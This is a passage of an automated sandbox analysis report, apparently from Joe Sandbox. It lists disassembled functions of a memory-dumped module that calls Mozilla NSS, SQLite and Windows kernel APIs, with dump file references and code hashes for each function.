Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

SECITEM_CopyItem_Util.NSS3(00000000,?,6C5566A0), ref: 6C59F8AA

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C59F8B9

Part of subcall function 6C5A1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5488A4,00000000,00000000), ref: 6C5A1228
Part of subcall function 6C5A1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C5A1238
Part of subcall function 6C5A1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5488A4,00000000,00000000), ref: 6C5A124B
Part of subcall function 6C5A1200: PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0,00000000,00000000,00000000,?,6C5488A4,00000000,00000000), ref: 6C5A125D
Part of subcall function 6C5A1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C5A126F
Part of subcall function 6C5A1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C5A1280
Part of subcall function 6C5A1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C5A128E
Part of subcall function 6C5A1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C5A129A
Part of subcall function 6C5A1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C5A12A1

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C59F8D9
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6718E0), ref: 6C59F905

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Pool$Alloc_Arena_CriticalFreeItem_Sectionfree$CallClearCopyDecodeDeleteEnterInitLockOnceQuickUnlockValuecallocmemcpy
String ID:
API String ID: 3757084236-0
Opcode ID: 9fa39e1467c20f0a7034124ae2734891509ce87c686b1cac0d631f2e446455f1
Instruction ID: f6f4d72fcc5c14d3d8de634fffd722290e45216ddfc2c87b897feaf24d4a16fe
Opcode Fuzzy Hash: 9fa39e1467c20f0a7034124ae2734891509ce87c686b1cac0d631f2e446455f1
Instruction Fuzzy Hash: C61127B2E00340ABE3009F269D41B6B7BE8AFC668CF004269F81487641FB31D91883E6

Function 6C558FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C560710), ref: 6C558FF1
PR_CallOnce.NSS3(6C6A2158,6C559150,00000000,?,?,?,6C559138,?,6C560710), ref: 6C559029
calloc.MOZGLUE(00000001,00000000,?,?,6C560710), ref: 6C55904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C560710), ref: 6C559066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C560710), ref: 6C559078

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: a9da734ba1355f1d02f5f0d7fc878ad29f06b57157f40e764f1e2539a22b01b1
Instruction ID: 87b1b2f5ba696c16dc4f5980e0ae0f225c8d299c960db44e04872d774d106393
Opcode Fuzzy Hash: a9da734ba1355f1d02f5f0d7fc878ad29f06b57157f40e764f1e2539a22b01b1
Instruction Fuzzy Hash: F41148B170011157E7105AEAAC44A6A33ACDB827ACF900832FD49C2B60F35BCC6683E9

Function 6C56CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C581E10: TlsGetValue.KERNEL32 ref: 6C581E36
Part of subcall function 6C581E10: EnterCriticalSection.KERNEL32(?,?,?,6C55B1EE,2404110F,?,?), ref: 6C581E4B
Part of subcall function 6C581E10: PR_Unlock.NSS3 ref: 6C581E76

free.MOZGLUE(?,6C56D079,00000000,00000001), ref: 6C56CDA5
PK11_FreeSymKey.NSS3(?,6C56D079,00000000,00000001), ref: 6C56CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C56D079,00000000,00000001), ref: 6C56CDCF
DeleteCriticalSection.KERNEL32(?,6C56D079,00000000,00000001), ref: 6C56CDE2
free.MOZGLUE(?), ref: 6C56CDE9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 1b95291f453085d18d7cef1d9df04f7b5005ca45a5432dc68e9ba1dda3f459f4
Instruction ID: 4b9e3d33bcf2244b55544bd843b5a961717df03b7412e288c68232ca71f674f8
Opcode Fuzzy Hash: 1b95291f453085d18d7cef1d9df04f7b5005ca45a5432dc68e9ba1dda3f459f4
Instruction Fuzzy Hash: 8211ACB2B01112BBEF00AFA6EC84996B73CFB44269B140121E91987E11E732F824C7E5

Function 6C5D2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C5D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5D5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D2CEC

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_EnterMonitor.NSS3(?), ref: 6C5D2D02
PR_EnterMonitor.NSS3(?), ref: 6C5D2D1F
PR_ExitMonitor.NSS3(?), ref: 6C5D2D42
PR_ExitMonitor.NSS3(?), ref: 6C5D2D5B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 99c6cc2100a953105dd9d7217eb8e4b2b25f8340cd5bb16d291170b69f174986
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: A801CCB1A003045BE6309E29FC40BC777A1EF45318F014525E55A96710E632FC16879A

Function 6C5D2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C5D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5D5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D2D9C

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_EnterMonitor.NSS3(?), ref: 6C5D2DB2
PR_EnterMonitor.NSS3(?), ref: 6C5D2DCF
PR_ExitMonitor.NSS3(?), ref: 6C5D2DF2
PR_ExitMonitor.NSS3(?), ref: 6C5D2E0B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 11c21ec9bad690b6f6fb1ea114fa23346ba29627098c99105ba0c3a1a075391d
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 6D01C8B1A007009BE7309E2AFC01BC7B7A2EF41318F010435E95A96B11E632FC15869A

Function 6C56AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C553090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C56AE42), ref: 6C5530AA
Part of subcall function 6C553090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5530C7
Part of subcall function 6C553090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5530E5
Part of subcall function 6C553090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C553116
Part of subcall function 6C553090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C55312B
Part of subcall function 6C553090: PK11_DestroyObject.NSS3(?,?), ref: 6C553154
Part of subcall function 6C553090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C55317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5499FF,?,?,?,?,?,?,?,?,?,6C542D6B,?), ref: 6C56AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5499FF,?,?,?,?,?,?,?,?,?,6C542D6B,?), ref: 6C56AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C542D6B,?,?,00000000), ref: 6C56AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C542D6B,?,?,00000000), ref: 6C56AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C542D6B,?,?), ref: 6C56AEA3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 08222a4bd8c8aad740a784904706b1f65a71692642e0793d3f69f03c54e4f5b0
Instruction ID: 0bfda44925b36e90e31f7dd22abe1613e13729307dbcc1823e08161ff0e4a75a
Opcode Fuzzy Hash: 08222a4bd8c8aad740a784904706b1f65a71692642e0793d3f69f03c54e4f5b0
Instruction Fuzzy Hash: BA0181B6B0417097E701916EAC85AAF31988BC765DF080432F90AD7F21FB15DD1943E3

Function 6C65BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C657AFE,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65BDC3
free.MOZGLUE(?,?,6C657AFE,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C657AFE,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65BDE9
free.MOZGLUE(?,00000000,00000000,?,6C657AFE,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65BE21
free.MOZGLUE(00000000,00000000,?,6C657AFE,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65BE32

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 97dd585e9f2e70afdec100a6bb09db6854cdd20e9801da66894d28f71f69b62d
Instruction ID: 2c3222e4e3b80ef86f3e470dcda86fcdaa766786163c0e993b295b92e126acfe
Opcode Fuzzy Hash: 97dd585e9f2e70afdec100a6bb09db6854cdd20e9801da66894d28f71f69b62d
Instruction Fuzzy Hash: 8A11C8B5B812019FDF00DFABE889B4A7BB5AB4A354F540069D90E87711E731B824CB99

Function 6C657C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C657C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C657C83
malloc.MOZGLUE(00000001), ref: 6C657C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C657C9F
PR_GetCurrentThread.NSS3 ref: 6C657CAD

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 6a465cd2f3baca03cb926e6a631e63c1427bf3e0281433eddc5342bf7fb1640c
Instruction ID: b0a4f4357be0758095de1a5b0574800d26ae13a970b402b5981f64c6a825e392
Opcode Fuzzy Hash: 6a465cd2f3baca03cb926e6a631e63c1427bf3e0281433eddc5342bf7fb1640c
Instruction Fuzzy Hash: 2AF0C2B1A202166FEB009F3A9C099477758EF01369B618435E809C7B00E735E124CAED

Function 6C65ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C65A6D8), ref: 6C65AE0D
free.MOZGLUE(?), ref: 6C65AE14
DeleteCriticalSection.KERNEL32(6C65A6D8), ref: 6C65AE36
free.MOZGLUE(?), ref: 6C65AE3D
free.MOZGLUE(00000000,00000000,?,?,6C65A6D8), ref: 6C65AE47

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: b757ade02a943cc321b1652f02ebcae9f6d0ad743ecc19c4bc8730746b11d42b
Instruction ID: bb8414a55b13d5c4592cee669c821debf0a908b6a6472eda7c783489dfac07e9
Opcode Fuzzy Hash: b757ade02a943cc321b1652f02ebcae9f6d0ad743ecc19c4bc8730746b11d42b
Instruction Fuzzy Hash: 37F0F675201A03B7CB009F69D848917B778BF86774B600328E12B83941D732E022D7DD

Function 6C5C9850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 233COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,?,?), ref: 6C5C9AE4

Strings

`@gl, xrefs: 6C5C991B, 6C5C9A15, 6C5C9A23
(, xrefs: 6C5C99BF
0@gl, xrefs: 6C5C98B3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error
String ID: ($0@gl$`@gl
API String ID: 2619118453-916512949
Opcode ID: 3f75a63698e01944951cd7c2fed97d7da55b288f0b472d22c2d18db7c75ec3ea
Instruction ID: 5c9c7b52a1e718b2b57654bdd6c78ca5acc58c3f1dfdb0c19e517e11b442f5e9
Opcode Fuzzy Hash: 3f75a63698e01944951cd7c2fed97d7da55b288f0b472d22c2d18db7c75ec3ea
Instruction Fuzzy Hash: 2C91EE35B04219DBDB10DF94CC90BADBBB1FF4830CF28852DE8456BA81D3709985CBA2

Function 6C4DBCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6C67AAF9,?), ref: 6C4DBE37

Strings

el, xrefs: 6C4DBDD7
Pel, xrefs: 6C4DBED4
winFileSize, xrefs: 6C4DBF07

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: el$Pel$winFileSize
API String ID: 4246442610-2533316112
Opcode ID: 9a048779d9f013329c9de5ac79115dc40272f3b6ae6a5910228c745ca3c37249
Instruction ID: 68e75dfdb7713c97d902df6d08351add36f0deb9bb331df1e165c046dc81e1ae
Opcode Fuzzy Hash: 9a048779d9f013329c9de5ac79115dc40272f3b6ae6a5910228c745ca3c37249
Instruction Fuzzy Hash: 1061AE35A04606EFDB04DF29C4A0EA9B7B1FF8A314F0646A9D8158BB40DB30F856CBD5

Function 6C4E7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4E7D35

Strings

%s at line %d of [%.10s], xrefs: 6C4E7D2E
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4E7D13, 6C4E7D1F, 6C4E7D47, 6C4E7D53, 6C4E7D5F
database corruption, xrefs: 6C4E7D29

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 6691dbee089cfa7f32460336cb70e59df698fa86b201d1beb9c8eb56340f27a6
Instruction ID: 85e949f5a0cde275ed777f8219a37271f143cf08181d886ee4cda7a2518d258e
Opcode Fuzzy Hash: 6691dbee089cfa7f32460336cb70e59df698fa86b201d1beb9c8eb56340f27a6
Instruction Fuzzy Hash: B731F471E0822997C710CF9DC880DBAB7E1AF88326B5A0596E554B7B86D271D842CBB4

Function 6C4D6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C4D6D36

Strings

%s at line %d of [%.10s], xrefs: 6C4D6D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4D6D20
database corruption, xrefs: 6C4D6D2A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 780874b204008332dad9b839fc4666ec978702c14629939c51bae95693695181
Instruction ID: ef10c5832988cc148e527d36149db1c8f44a7f6b32cebe92082f1a89a25b058f
Opcode Fuzzy Hash: 780874b204008332dad9b839fc4666ec978702c14629939c51bae95693695181
Instruction Fuzzy Hash: 3B21E0707003059BC720DE19E851F9AB7E2AF85308F25892CD8599BF51E771F9498BA2

Function 6C5B2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+[l,6C5B32C2,<+[l,00000000,00000000,?), ref: 6C5B2FDA

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
